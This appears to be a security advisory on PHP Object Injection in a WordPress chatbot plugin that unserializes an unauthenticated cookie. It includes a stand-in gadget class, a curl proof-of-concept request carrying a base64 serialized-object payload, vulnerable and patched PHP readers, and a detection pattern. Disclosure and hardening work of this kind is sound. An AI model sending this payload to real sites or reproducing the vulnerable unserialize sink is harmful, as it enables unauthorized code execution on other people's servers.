The plugin unserializes user input taken from a cookie inside an AJAX action that is available to unauthenticated users, which could allow them to perform PHP Object Injection when a suitable gadget chain is present on the blog.
To simulate a gadget chain, put the following code in a plugin:

    class Evil {
        public function __wakeup(): void {
            die("Arbitrary deserialization");
        }
    }

Then, when a GPT engine is set as the OpenAI model in the settings (/wp-admin/admin.php?page=wpbot_openAi), make the request below to trigger the unserialization:

    curl -X 'POST' -b 'last_five_prompt=Tzo0OiJFdmlsIjowOnt9' 'https://example.com/wp-admin/admin-ajax.php?action=openai_response'

Tzo0OiJFdmlsIjowOnt9 is the base64 encoding of O:4:"Evil":0:{}
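The fix side of this issue, as an added example that is not the plugin's own code. It assumes, from the proof of concept above, that the openai_response handler base64-decodes the last_five_prompt cookie and passes the result to unserialize(); the function names and the shape of the stored data (a list of up to five prompt strings) are assumptions made for illustration. The vulnerable reader is shown beside two hardened readers: one that keeps the serialized format but forbids every class, and one that switches the cookie to JSON.

```php
<?php
// Added example (not the plugin's code). Assumed: the AJAX handler reads the
// `last_five_prompt` cookie, base64-decodes it and calls unserialize() on it.
// All function names below are hypothetical.

// Stand-in gadget from the advisory, declared first so every reader can see it.
class Evil
{
    public function __wakeup(): void
    {
        echo "gadget executed\n";
    }
}

// 1. Vulnerable pattern: the cookie chooses which class is instantiated, so any
//    class with a __wakeup()/__destruct() gadget on the site is reachable from an
//    unauthenticated request.
function wpbot_last_prompts_vulnerable(string $cookie): array
{
    $decoded = base64_decode($cookie, true);
    if ($decoded === false) {
        return [];
    }
    $data = @unserialize($decoded);   // object injection sink
    return is_array($data) ? $data : [];
}

// 2. Minimal fix when the serialized format must be kept: refuse every class.
//    Objects in the payload come back as __PHP_Incomplete_Class, no magic method
//    runs, and anything that is not a plain list of strings is discarded.
function wpbot_last_prompts_no_objects(string $cookie): array
{
    $decoded = base64_decode($cookie, true);
    if ($decoded === false) {
        return [];
    }
    $data = @unserialize($decoded, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return [];
    }
    return wpbot_only_prompt_strings($data);
}

// 3. Preferred fix: store the list as JSON. json_decode() only ever produces
//    scalars, arrays and stdClass, so there is no class name for an attacker
//    to choose and no gadget to trigger.
function wpbot_last_prompts_json(string $cookie): array
{
    $data = json_decode($cookie, true, 2);   // depth 2: a flat list only
    if (!is_array($data)) {
        return [];
    }
    return wpbot_only_prompt_strings($data);
}

// Shared allow-list applied after decoding: keep at most five short strings.
function wpbot_only_prompt_strings(array $data): array
{
    $prompts = [];
    foreach ($data as $item) {
        if (is_string($item) && strlen($item) <= 1000) {
            $prompts[] = $item;
        }
        if (count($prompts) === 5) {
            break;
        }
    }
    return $prompts;
}

// Demo (run with `php this_file.php`): the advisory's payload against each
// reader, then a benign value through the hardened ones.
$malicious = 'Tzo0OiJFdmlsIjowOnt9';                       // O:4:"Evil":0:{}
$benign    = base64_encode(serialize(['hello', 'world'])); // constructed sample

wpbot_last_prompts_vulnerable($malicious);          // Evil is instantiated, __wakeup() runs
var_dump(wpbot_last_prompts_no_objects($malicious)); // incomplete class, nothing runs
var_dump(wpbot_last_prompts_no_objects($benign));
var_dump(wpbot_last_prompts_json(json_encode(['hello', 'world'])));
```

Besides changing the sink, the handler should not be registered on the nopriv AJAX hook unless anonymous access is really required, and any state the plugin keeps in cookies should be treated as attacker-controlled on every request. For detection while the plugin is unpatched, requests to admin-ajax.php whose cookies decode to a PHP serialized object marker (`O:<n>:"`) are a reliable indicator of an attempted injection, since legitimate prompt lists never contain objects.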